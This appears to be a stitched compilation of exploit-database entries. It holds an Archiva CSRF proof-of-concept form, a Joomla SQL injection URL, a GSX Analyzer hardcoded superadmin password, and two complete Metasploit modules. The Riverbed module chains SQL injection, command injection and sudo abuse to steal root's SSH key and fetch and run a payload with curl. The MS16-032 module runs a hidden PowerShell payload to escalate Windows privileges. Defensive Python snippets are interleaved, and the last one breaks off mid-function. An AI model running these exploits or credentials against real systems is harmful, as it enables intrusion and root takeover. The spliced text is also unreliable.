
RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product:        Apache Archiva
Vendor URL:     https://archiva.apache.org
Type:           Cross-Site Request Forgery [CWE-253]
Date found:     2016-05-31
Date published: 2016-07-11
CVSSv3 Score:   5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)
CVE:            CVE-2016-4469


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
Apache Archiva v1.3.9
Older versions may be affected too.


4. INTRODUCTION
===============
Apache Archiva is an extensible repository management software that helps
taking care of your own personal or enterprise-wide build artifact
repository. It is the perfect companion for build tools such as Maven,
Continuum, and ANT.

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
The application offers Cross-Site Request Forgery protection using a
Struts-based token named "token". While many administrative functions, such
as adding new users, are protected this way, the following HTTP POST-based
functions do not check this token and are therefore vulnerable to CSRF:

Adding new repository proxy connectors:
/archiva/admin/addProxyConnector_commit.action

Adding new repositories:
/archiva/admin/addRepository_commit.action

Editing existing repositories:
/archiva/admin/editRepository_commit.action

Adding legacy artifact paths:
/archiva/admin/addLegacyArtifactPath_commit.action

Changing the organizational appearance:
/archiva/admin/saveAppearance.action

Uploading new artifacts:
/archiva/upload_submit.action


The following Proof-of-Concept triggers this vulnerability and adds a new
proxy connector called "CSRF":


<html>
  <body>
    <form
action="http://localhost:8080/archiva/admin/addProxyConnector_commit.action"
method="POST">
      <input type="hidden" name="pattern" value="" />
      <input type="hidden" name="connector&#46;order" value="0" />
      <input type="hidden" name="connector&#46;proxyId"
value="&#40;direct&#32;connection&#41;" />
      <input type="hidden" name="connector&#46;sourceRepoId" value="CSRF" />
      <input type="hidden" name="connector&#46;targetRepoId"
value="maven2&#45;repository&#46;dev&#46;java&#46;net" />
      <input type="hidden"
name="connector&#46;policies&#91;&apos;propagate&#45;errors&#45;on&#45;update&apos;&#93;"
value="always" />
      <input type="hidden"
name="connector&#46;policies&#91;&apos;cache&#45;failures&apos;&#93;"
value="no" />
      <input type="hidden"
name="connector&#46;policies&#91;&apos;releases&apos;&#93;"
value="always" />
      <input type="hidden"
name="connector&#46;policies&#91;&apos;propagate&#45;errors&apos;&#93;"
value="stop" />
      <input type="hidden"
name="connector&#46;policies&#91;&apos;checksum&apos;&#93;" value="fail" />
      <input type="hidden"
name="connector&#46;policies&#91;&apos;snapshots&apos;&#93;"
value="always" />
      <input type="hidden" name="propertyKey" value="" />
      <input type="hidden" name="propertyValue" value="" />
      <input type="hidden" name="blackListPattern" value="" />
      <input type="hidden" name="whiteListPattern" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


6. RISK
=======
To successfully exploit this vulnerability, a user with administrative rights
must be tricked into visiting an attacker-controlled website while holding an
authenticated session in the application.

The vulnerability allows remote attackers to perform sensitive
administrative actions like adding new repository proxy connectors, adding
new repositories, editing existing repositories, adding legacy artifact
paths, changing the organizational appearance or uploading new artifacts in
the authentication context of the targeted user.
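The root cause described above is a per-action, opt-in token check: the six commit actions were simply never wired up to it. The Python sketch below is an added example, not code from Apache Archiva or from the advisory. It shows the shape a defender would want instead: one dispatcher that enforces a session-bound synchronizer token on every POST, which a handler can only skip by being declared read-only. The route path and form field names are taken from the proof of concept; the session id, server key and in-memory connector store are constructed for the demo.

```python
import hashlib
import hmac
import secrets

# Constructed per-process key; a real deployment loads it from protected configuration.
SERVER_KEY = secrets.token_bytes(32)

# In-memory stand-in for the proxy-connector configuration (constructed).
CONNECTORS = {}


def issue_token(session_id):
    """Per-session synchronizer token: HMAC(key, session id). Nothing is stored
    server-side, and a token minted for one session is useless in another."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def token_is_valid(session_id, presented):
    """Constant-time comparison; an absent token is simply invalid."""
    if not presented:
        return False
    return hmac.compare_digest(issue_token(session_id), presented)


class Request:
    def __init__(self, method, path, session_id, form):
        self.method, self.path, self.session_id, self.form = method, path, session_id, form


class Dispatcher:
    """Routes '*.action' paths to handlers. The token check lives here, once, for
    every POST; a handler avoids it only by being explicitly declared read-only.
    This inverts the advisory's situation, where each action had to remember to
    check the token itself."""

    def __init__(self):
        self.routes = {}

    def route(self, path, read_only=False):
        def register(handler):
            self.routes[path] = (handler, read_only)
            return handler
        return register

    def handle(self, req):
        entry = self.routes.get(req.path)
        if entry is None:
            return 404, "not found"
        handler, read_only = entry
        if req.method == "POST" and not read_only:
            if not token_is_valid(req.session_id, req.form.get("token")):
                return 403, "missing or invalid CSRF token"
        return handler(req)


app = Dispatcher()


@app.route("/archiva/admin/addProxyConnector_commit.action")
def add_proxy_connector(req):
    # Field names taken from the advisory's proof of concept.
    source = req.form["connector.sourceRepoId"]
    CONNECTORS[source] = {
        "target": req.form["connector.targetRepoId"],
        "proxy": req.form.get("connector.proxyId", ""),
    }
    return 200, f"connector {source} added"


def demo():
    """Replays the scenario: a cross-site form cannot carry the victim's token, a
    token stolen from some other session does not match, and only the form the
    application itself rendered for this session succeeds."""
    victim_session = "JSESSIONID-constructed"
    path = "/archiva/admin/addProxyConnector_commit.action"
    forged = {"connector.sourceRepoId": "CSRF",
              "connector.targetRepoId": "maven2-repository.dev.java.net"}
    wrong_session = dict(forged, token=issue_token("some-other-session"))
    legit = dict(forged, **{"connector.sourceRepoId": "internal",
                            "token": issue_token(victim_session)})
    results = [
        app.handle(Request("POST", path, victim_session, forged))[0],
        app.handle(Request("POST", path, victim_session, wrong_session))[0],
        app.handle(Request("POST", path, victim_session, legit))[0],
    ]
    return results, sorted(CONNECTORS)


if __name__ == "__main__":
    print(demo())
```

demo() returns ([403, 403, 200], ['internal']): the forged PoC form and the cross-session token are both refused and only the legitimate submission creates a connector. Deriving the token with an HMAC over the session id keeps the server stateless, and hmac.compare_digest keeps the check constant-time; the important property, though, is structural: a new `*_commit.action` added tomorrow is protected unless someone deliberately marks it read-only.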


7. SOLUTION
===========
Upgrade/Migrate to Apache Archiva 2.2.1


8. REPORT TIMELINE
==================
2016-05-31: Discovery of the vulnerability
2016-05-31: Notified vendor via public security mail address
2016-06-06: No response, sent out another notification
2016-06-10: Vendor states that this version is out of support
2016-06-21: Vendor assigns CVE-2016-4469
2016-07-11: Advisory released


9. REFERENCES
=============
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4469
            
# Exploit Title: Joomla Guru Pro (com_guru) Component - SQL Injection
# Exploit Author: s0nk3y
# Date: 14/07/2016
# Vendor Homepage: https://www.ijoomla.com
# Software Link: https://www.ijoomla.com/component/digistore/products/47-joomla-add-ons/119-guru-pro/189?Itemid=189
# Category: webapps
# Version: All
# Tested on: Ubuntu 16.04

1. Description

Turn your knowledge into dollars! Sell Your Courses Today!

Guru, allows you to create online courses easily! We believe that everyone is an expert in something. If you know something that others don't, there is no better time to profit from it. You can create a course about your topic and start generating income.

2. Proof of Concept

The Itemid parameter is vulnerable to SQL injection:

com_guru&view=gurupcategs&layout=view&Itemid=[SQL Injection]&lang=en

Demo:
http://server/index.php?option=com_guru&view=gurupcategs&layout=view&Itemid=123%27&lang=en
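Itemid is a Joomla menu item id, an integer, so on the application side the fix is strict typing before the value reaches a query, and on the detection side any non-integer Itemid in the access log is a probe worth flagging. The Python below is an added example, not part of this exploit entry or of the Guru component: validate_int_param is what a component should do with Itemid, and suspicious_requests applies the same rule to constructed Apache-style access-log lines. It generalises past Itemid to every parameter listed in INTEGER_PARAMS (that set, apart from Itemid, is an assumption for the demo).

```python
import re
from urllib.parse import parse_qs, urlsplit

# Request parameters this application treats as integers. Itemid is Joomla's menu
# item id; the rest of the set is an assumption for the demo.
INTEGER_PARAMS = {"Itemid", "id", "catid"}

# Enough of the combined log format to pull out the client and the request target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)


def validate_int_param(value, lo=0, hi=2**31 - 1):
    """Strict integer parsing for a query parameter destined for SQL.

    Anything that is not a plain run of digits (a trailing quote, a space, a sign,
    an exponent) is rejected before it can reach string concatenation. The range is
    enforced too: a syntactically valid integer outside the column's range is still
    a bug."""
    if not isinstance(value, str) or not re.fullmatch(r"[0-9]{1,10}", value):
        raise ValueError(f"not an integer: {value!r}")
    n = int(value)
    if not lo <= n <= hi:
        raise ValueError(f"out of range: {n}")
    return n


def suspicious_requests(log_lines):
    """Apply the same rule to access-log lines: an integer-typed parameter that
    fails validate_int_param is reported as (client, parameter, decoded value)."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for name in sorted(INTEGER_PARAMS):
            for raw in params.get(name, ()):  # parse_qs has already percent-decoded
                try:
                    validate_int_param(raw)
                except ValueError:
                    hits.append((m["ip"], name, raw))
    return hits


# Constructed access-log lines. The second request has the shape of the demo URL
# above (Itemid=123%27); the others are benign traffic plus one more probe.
LOG_SAMPLE = [
    '203.0.113.7 - - [14/Jul/2016:10:00:01 +0000] "GET /index.php?option=com_guru&view=gurupcategs&layout=view&Itemid=123&lang=en HTTP/1.1" 200 5120',
    '203.0.113.7 - - [14/Jul/2016:10:00:05 +0000] "GET /index.php?option=com_guru&view=gurupcategs&layout=view&Itemid=123%27&lang=en HTTP/1.1" 500 312',
    '198.51.100.9 - - [14/Jul/2016:10:01:00 +0000] "GET /index.php?option=com_content&view=article&id=42&Itemid=7 HTTP/1.1" 200 8800',
    '198.51.100.9 - - [14/Jul/2016:10:01:30 +0000] "GET /index.php?option=com_guru&view=gurupcategs&layout=view&Itemid=0%27&lang=en HTTP/1.1" 500 312',
]

if __name__ == "__main__":
    for ip, name, raw in suspicious_requests(LOG_SAMPLE):
        print(f"{ip} sent non-integer {name}={raw!r}")
```

Validating the type is cheaper and more robust than trying to recognise injection syntax: the rule "Itemid is digits only" has no bypass, whereas a blacklist of quotes and keywords always does. Parameterised queries remain the real fix inside the component; the validator is what makes the error path a clean 400 instead of a database error.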
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  require 'digest'

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution",
      'Description'    => %q{
        This module exploits three separate vulnerabilities found in the Riverbed SteelCentral NetProfiler/NetExpress
        virtual appliances to obtain remote command execution as the root user. A SQL injection in the login form
        can be exploited to add a malicious user into the application's database. An attacker can then exploit a
        command injection vulnerability in the web interface to obtain arbitrary code execution. Finally, an insecure
        configuration of the sudoers file can be abused to escalate privileges to root.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Francesco Oddo <francesco.oddo[at]security-assessment.com>' ],
      'References'     =>
        [
          [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf' ]
        ],
      'Platform'       => 'linux',
      'Arch'           => ARCH_X86_64,
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Targets'        =>
        [
          [ 'Riverbed SteelCentral NetProfiler 10.8.7 / Riverbed NetExpress 10.8.7', { }]
        ],
      'DefaultOptions' =>
        {
          'SSL' => true
        },
      'Privileged'     => false,
      'DisclosureDate' => "Jun 27 2016",
      'DefaultTarget'  => 0
      ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The target URI', '/']),
        OptString.new('RIVERBED_USER', [true, 'Web interface user account to add', 'user']),
        OptString.new('RIVERBED_PASSWORD', [true, 'Web interface user password', 'riverbed']),
        OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
        Opt::RPORT(443)
      ],
      self.class
    )
  end

  def check
    json_payload_check = "{\"username\":\"check_vulnerable%'; SELECT PG_SLEEP(2)--\", \"password\":\"pwd\"}"

    # Verifies existence of login SQLi
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
      'ctype' => 'application/json',
      'encode_params' => false,
      'data'     => json_payload_check
     })

     if res && res.body && res.body.include?('AUTH_DISABLED_ACCOUNT')
       return Exploit::CheckCode::Vulnerable
     end

     Exploit::CheckCode::Safe
  end

  def exploit

    print_status("Attempting log in to target appliance")
    @sessid = do_login

    print_status("Confirming command injection vulnerability")
    test_cmd_inject
    vprint_status('Ready to execute payload on appliance')

    @elf_sent = false
    # Generate payload
    @pl = generate_payload_exe

    if @pl.nil?
      fail_with(Failure::BadConfig, 'Please select a valid Linux payload')
    end

    # Start the server and use primer to trigger fetching and running of the payload
    begin
      Timeout.timeout(datastore['HTTPDELAY']) { super }
    rescue Timeout::Error
    end

  end

  def get_nonce
    # Function to get nonce from login page

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path,'/index.php'),
     })

    if res && res.body && res.body.include?('nonce_')
       html = res.get_html_document
       nonce_field = html.at('input[@name="nonce"]')
       nonce = nonce_field.attributes["value"]
    else
       fail_with(Failure::Unknown, 'Unable to get login nonce.')
    end

    # needed as login nonce is bounded to preauth SESSID cookie
    sessid_cookie_preauth = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''

    return [nonce, sessid_cookie_preauth]

  end

  def do_login

    uname = datastore['RIVERBED_USER']
    passwd = datastore['RIVERBED_PASSWORD']

    nonce, sessid_cookie_preauth = get_nonce
    post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path,'/index.php'),
      'cookie' => "SESSID=#{sessid_cookie_preauth}",
      'ctype' => 'application/x-www-form-urlencoded',
      'encode_params' => false,
      'data'     => post_data
     })

    # Exploit login SQLi if credentials are not valid.
    if res && res.body && res.body.include?('<form name="login"')
       print_status("Invalid credentials. Creating malicious user through login SQLi")

       create_user
       nonce, sessid_cookie_preauth = get_nonce
       post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"

       res = send_request_cgi({
         'method' => 'POST',
         'uri' => normalize_uri(target_uri.path,'/index.php'),
         'cookie' => "SESSID=#{sessid_cookie_preauth}",
         'ctype' => 'application/x-www-form-urlencoded',
         'encode_params' => false,
         'data'     => post_data
       })

       sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
       print_status("Saving login credentials into Metasploit DB")
       report_cred(uname, passwd)
    else
       print_status("Valid login credentials provided. Successfully logged in")
       sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
       print_status("Saving login credentials into Metasploit DB")
       report_cred(uname, passwd)
    end

    return sessid_cookie

  end

  def report_cred(username, password)
    # Function used to save login credentials into Metasploit database
    service_data = {
      address: rhost,
      port: rport,
      service_name: ssl ? 'https' : 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      module_fullname: self.fullname,
      origin_type: :service,
      username: username,
      private_data: password,
      private_type: :password
    }.merge(service_data)

    credential_core = create_credential(credential_data)

    login_data = {
      core: credential_core,
      last_attempted_at: DateTime.now,
      status: Metasploit::Model::Login::Status::SUCCESSFUL
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def create_user
    # Function exploiting login SQLi to create a malicious user
    username = datastore['RIVERBED_USER']
    password = datastore['RIVERBED_PASSWORD']

    usr_payload = generate_sqli_payload(username)
    pwd_hash = Digest::SHA512.hexdigest(password)
    pass_payload = generate_sqli_payload(pwd_hash)
    uid = rand(999)

    json_payload_sqli = "{\"username\":\"adduser%';INSERT INTO users (username, password, uid) VALUES ((#{usr_payload}), (#{pass_payload}), #{uid});--\", \"password\":\"pwd\"}"

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
      'ctype' => 'application/json',
      'encode_params' => false,
      'data'     => json_payload_sqli
     })

    json_payload_checkuser = "{\"username\":\"#{username}\", \"password\":\"#{password}\"}"

     res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
      'ctype' => 'application/json',
      'encode_params' => false,
      'data'     => json_payload_checkuser
     })

     if res && res.body && res.body.include?('session_id')
       print_status("User account successfully created, login credentials: '#{username}':'#{password}'")
     else
       fail_with(Failure::UnexpectedReply, 'Unable to add user to database')
     end

  end

  def generate_sqli_payload(input)
    # Encodes the user/pass value as a CHR(n)||CHR(n)||... concatenation, the
    # format the injected INSERT expects
    input.strip.each_char.map { |c| "CHR(#{c.ord})" }.join('||')
  end

  def test_cmd_inject
    post_data = "xjxfun=get_request_key&xjxr=1457064294787&xjxargs[]=Stoken; id;"

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path,'/index.php?page=licenses'),
      'cookie' => "SESSID=#{@sessid}",
      'ctype' => 'application/x-www-form-urlencoded',
      'encode_params' => false,
      'data'     => post_data
     })

    unless res && res.body.include?('uid=')
      fail_with(Failure::UnexpectedReply, 'Could not inject command, may not be vulnerable')
    end

  end

  def cmd_inject(cmd)

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path,'/index.php?page=licenses'),
      'cookie' => "SESSID=#{@sessid}",
      'ctype' => 'application/x-www-form-urlencoded',
      'encode_params' => false,
      'data'     => cmd
     })

  end

  # Deliver payload to appliance and make it run it
  def primer

    # Gets the autogenerated uri
    payload_uri = get_uri

    root_ssh_key_private = rand_text_alpha_lower(8)
    binary_payload = rand_text_alpha_lower(8)

    print_status("Privilege escalate to root and execute payload")

    privesc_exec_cmd = "xjxfun=get_request_key&xjxr=1457064346182&xjxargs[]=Stoken;  sudo -u mazu /usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date -f /opt/cascade/vault/ssh/root/id_rsa | cut -d ' ' -f 4- | tr -d '`' | tr -d \"'\" > /tmp/#{root_ssh_key_private}; chmod 600 /tmp/#{root_ssh_key_private}; ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i /tmp/#{root_ssh_key_private} root@localhost '/usr/bin/curl -k #{payload_uri} -o /tmp/#{binary_payload}; chmod 755 /tmp/#{binary_payload}; /tmp/#{binary_payload}'"

    cmd_inject(privesc_exec_cmd)

    register_file_for_cleanup("/tmp/#{root_ssh_key_private}")
    register_file_for_cleanup("/tmp/#{binary_payload}")

    vprint_status('Finished primer hook, raising Timeout::Error manually')
    raise(Timeout::Error)
  end

  # Handle incoming requests from the server
  def on_request_uri(cli, request)
    vprint_status("on_request_uri called: #{request.inspect}")
    print_status('Sending the payload to the server...')
    @elf_sent = true
    send_response(cli, @pl)
  end

end
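The third link in the chain the module describes, a sudoers entry that lets a service account run a wrapper which itself invokes sudo, is the kind of configuration a routine audit catches before anyone chains it. The Python below is an added example, not part of the Metasploit module or of Riverbed's software. The sudoers text is constructed and only loosely modelled on the command sequence visible in primer; the appliance's real sudoers file is not reproduced on the page. The audit flags three patterns: rules granting ALL, commands that are themselves a privilege switch, and NOPASSWD rules with no argument restriction.

```python
import re

RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
TAG_RE = re.compile(
    r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|NOLOG_INPUT|"
    r"LOG_OUTPUT|NOLOG_OUTPUT|MAIL|NOMAIL|FOLLOW|NOFOLLOW):\s*"
)
SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")


def parse_rules(text):
    """Return (user_or_group, runas_user, command, nopasswd) for every command in
    every user specification. A tag such as NOPASSWD: applies to all following
    commands in the same list until another tag overrides it, which is easy to
    miss when reading the file by eye."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = (m["runas"] or "root").split(":")[0]
        nopasswd = False
        for spec in m["cmds"].split(","):
            spec = spec.strip()
            while (t := TAG_RE.match(spec)):
                if t.group(1) == "NOPASSWD":
                    nopasswd = True
                elif t.group(1) == "PASSWD":
                    nopasswd = False
                spec = spec[t.end():]
            if spec:
                rules.append((m["who"], runas, spec, nopasswd))
    return rules


def audit(text):
    """Return (who, runas, command, reason) for rules that deserve a second look."""
    findings = []
    for who, runas, cmd, nopasswd in parse_rules(text):
        path, _, args = cmd.partition(" ")
        program = path.rsplit("/", 1)[-1]
        if cmd == "ALL" and who != "root":
            findings.append((who, runas, cmd, "grants every command"))
        if program in ("sudo", "su"):
            findings.append((who, runas, cmd,
                             "command is itself a privilege switch; the listed runas user is not the real limit"))
        if nopasswd and cmd != "ALL" and not args:
            findings.append((who, runas, cmd,
                             "NOPASSWD with no argument list: sudoers then accepts any arguments"))
    return findings


# Constructed sudoers text, not the appliance's real file. The last two rules are
# modelled on the chain visible in primer: a web user reaches a service account via
# a wrapper, and that account may in turn run sudo.
SUDOERS_SAMPLE = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/ /mnt/backup/   # arguments pinned
www     ALL=(mazu) NOPASSWD: /usr/mazu/bin/mazu-run
mazu    ALL=(root) NOPASSWD: /usr/bin/sudo, /bin/date
"""

if __name__ == "__main__":
    for who, runas, cmd, reason in audit(SUDOERS_SAMPLE):
        print(f"{who:8} -> {runas:6} {cmd:28} {reason}")
```

The rsync rule produces no finding because its arguments are pinned; the mazu rule produces three, because the NOPASSWD tag carries over to /bin/date and because a rule whose command is sudo makes the runas column meaningless. Running this against real files means also expanding aliases and #include directives, which the sample omits.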
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/payload_generator'
require 'msf/core/exploit/powershell'
require 'rex'

class MetasploitModule < Msf::Exploit::Local

  Rank = NormalRanking

  include Msf::Exploit::Powershell
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::File
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'MS16-032 Secondary Logon Handle Privilege Escalation',
      'Description'   => %q{
        This module exploits the lack of sanitization of standard handles in Windows' Secondary
        Logon Service.  The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12
        32 and 64 bit.  This module will only work against those versions of Windows with
        Powershell 2.0 or later and systems with two or more CPU cores.
      },
      'License'       => BSD_LICENSE,
      'Author'        =>
        [
          'James Forshaw', # twitter.com/tiraniddo
          'b33f',          # @FuzzySec, http://www.fuzzysecurity.com
          'khr0x40sh'
        ],
      'References'    =>
        [
          [ 'MS', 'MS16-032'],
          [ 'CVE', '2016-0099'],
          [ 'URL', 'https://twitter.com/FuzzySec/status/723254004042612736' ],
          [ 'URL', 'https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html']
        ],
      'DefaultOptions' =>
        {
          'WfsDelay' => 30,
          'EXITFUNC' => 'thread'
        },
      'DisclosureDate' => 'Mar 21 2016',
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ],
      'Targets'       =>
        [
          # Tested on (32 bits):
          # * Windows 7 SP1
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          # Tested on (64 bits):
          # * Windows 7 SP1
          # * Windows 8
          # * Windows 2012
          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
      'DefaultTarget' => 0
      ))

    register_advanced_options(
      [
        OptString.new('W_PATH', [false, 'Where to write temporary powershell file', nil]),
        OptBool.new(  'DRY_RUN', [false, 'Only show what would be done', false ]),
        # How long until we DELETE file, we have a race condition here, so anything less than 60
        # seconds might break
        OptInt.new('TIMEOUT', [false, 'Execution timeout', 60])
      ], self.class)
  end

  def get_arch
    arch = nil

    if sysinfo["Architecture"] =~ /(wow|x)64/i
      arch = ARCH_X86_64
    elsif sysinfo["Architecture"] =~ /x86/i
      arch = ARCH_X86
    end

    arch
  end

  def check
    os = sysinfo["OS"]

    if os !~ /win/i
      # Non-Windows systems are definitely not affected.
      return Exploit::CheckCode::Safe
    end

    Exploit::CheckCode::Detected
  end

  def exploit
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    arch1 = get_arch
    if check == Exploit::CheckCode::Safe
      print_error("Target is not Windows")
      return
    elsif arch1 == nil
      print_error("Architecture could not be determined.")
      return
    end

    # Exploit PoC from 'b33f'
    ps_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-0099', 'cve_2016_0099.ps1')
    vprint_status("PS1 loaded from #{ps_path}")
    ms16_032 = File.read(ps_path)

    cmdstr = expand_path('%windir%') << '\\System32\\windowspowershell\\v1.0\\powershell.exe'

    if datastore['TARGET'] == 0 && arch1 == ARCH_X86_64
      cmdstr.gsub!("System32","SYSWOW64")
      print_warning("Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell")
      vprint_warning("#{cmdstr}")
    end

    # payload formatted to fit dropped text file
    payl = cmd_psh_payload(payload.encoded,payload.arch,{
      encode_final_payload: false,
      remove_comspec: true,
      method: 'old'
    })

    payl.sub!(/.*?(?=New-Object IO)/im, "")
    payl = payl.split("';$s.")[0]
    payl.gsub!("''","'")
    payl = "$s=#{payl}while($true){Start-Sleep 1000};"

    @upfile = Rex::Text.rand_text_alpha(rand(8) + 6) + ".txt"
    path = datastore['W_PATH'] || pwd
    @upfile = "#{path}\\#{@upfile}"
    fd = session.fs.file.new(@upfile, "wb")
    print_status("Writing payload file, #{@upfile}...")
    fd.write(payl)
    fd.close
    psh_cmd = "IEX `$(gc #{@upfile})"

    # lpAppName
    ms16_032.gsub!("$cmd", "\"#{cmdstr}\"")
    # lpCommandLine - capped at 1024b
    ms16_032.gsub!("$args1", "\" -exec Bypass -nonI -window Hidden #{psh_cmd}\"")

    print_status('Compressing script contents...')
    ms16_032_c = compress_script(ms16_032)

    if ms16_032_c.size > 8100
      print_error("Compressed size: #{ms16_032_c.size}")
      error_msg = "Compressed size may cause command to exceed "
      error_msg += "cmd.exe's 8kB character limit."
      print_error(error_msg)
    else
      print_good("Compressed size: #{ms16_032_c.size}")
    end

    if datastore['DRY_RUN']
      print_good("cmd.exe /C powershell -exec Bypass -nonI -window Hidden #{ms16_032_c}")
      return
    end

    print_status("Executing exploit script...")
    cmd = "cmd.exe /C powershell -exec Bypass -nonI -window Hidden #{ms16_032_c}"
    args = nil

    begin
      process = session.sys.process.execute(cmd, args, {
        'Hidden' => true,
        'Channelized' => false
      })
    rescue
      print_error("An error occurred executing the script.")
    end
  end

  def cleanup
    sleep_t = datastore['TIMEOUT']
    vprint_warning("Sleeping #{sleep_t} seconds before deleting #{@upfile}...")
    sleep sleep_t

    begin
      rm_f(@upfile)
      print_good("Cleaned up #{@upfile}")
    rescue
      print_error("There was an issue with cleanup of the powershell payload script.")
    end
  end
end
            
# Exploit Title: GSX Analyzer hardcoded superadmin credentials in Main.swf
# Google Dork: inurl:"/Main.swf?cachebuster=" (need to manually look for stringtitle "Loading GSX Analyzer ... 0%")
# Date: 12-07-16
# Exploit Author: ndevnull
# Vendor Homepage: http://www.gsx.com/products/gsx-analyzer
# Software Link: http://www.gsx.com/download-the-trial-ma
# Version: 10.12, but also found in version 11
# Tested on: Windows Server 2008
# CERT : VR-241
# CVE : 

1. Description

After decompiling the SWF file "Main.swf", a hardcoded credential was found in one of GSX's products, GSX Analyzer. The credential is a superadmin account that is not listed in the user list but can be used to log in to GSX Analyzer portals. It appears to be a backdoor, or a "solution" for the vendor to provide "support".

The credentials found are:
Username: gsxlogin
Password: gsxpassword

2. Proof of Concept
 
A number of internet-facing sites are affected. Presumably every externally exposed GSX Analyzer portal has this vulnerability.
 
Code snippet:
-----------------
if ((((event.getLogin().toLowerCase() == "gsxlogin")) && ((event.getPwd() == "gsxpassword")))){
-----------------

3. Solution:

The vendor was informed on 12-06-16, and CERT has been notified (ID VR-241).
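The finding above is a literal string compared against a credential accessor, which is cheap to detect mechanically once the SWF is decompiled. The scanner below is an added example, not part of the advisory or of GSX's product: it reports any expression whose name suggests a credential (CRED_WORDS, an assumption to tune per codebase) being compared for equality or inequality with a non-empty string literal. The ActionScript sample is constructed around the single line quoted in the advisory; the surrounding handler is invented to show what the scanner ignores.

```python
import re

# Identifier fragments that suggest a credential is being handled. An assumption for
# the demo; tune per codebase.
CRED_WORDS = r"(?:pwd|passw(?:or)?d|secret|login|user(?:name)?|token|api_?key)"

# A credential-looking expression (optionally a getter call, optionally lower-cased)
# compared with a non-empty string literal, e.g.   event.getPwd() == "gsxpassword"
LITERAL_CMP_RE = re.compile(
    r"(?P<lhs>[\w.]*" + CRED_WORDS + r"[\w.]*(?:\(\))?(?:\.toLowerCase\(\))?)"
    r"\s*[!=]==?\s*(?P<q>[\"'])(?P<lit>[^\"']+)(?P=q)",
    re.IGNORECASE,
)


def scan_for_literal_credentials(source):
    """Return (line number, compared expression, literal) for every match, in order.

    The comparison, not the literal, is what makes this a backdoor rather than a
    label: a string constant named 'password' is noise, but getPwd() == "..." is a
    fixed secret that authenticates anyone who reads the binary. Comparisons with
    the empty string are skipped; they are ordinary input validation."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in LITERAL_CMP_RE.finditer(line):
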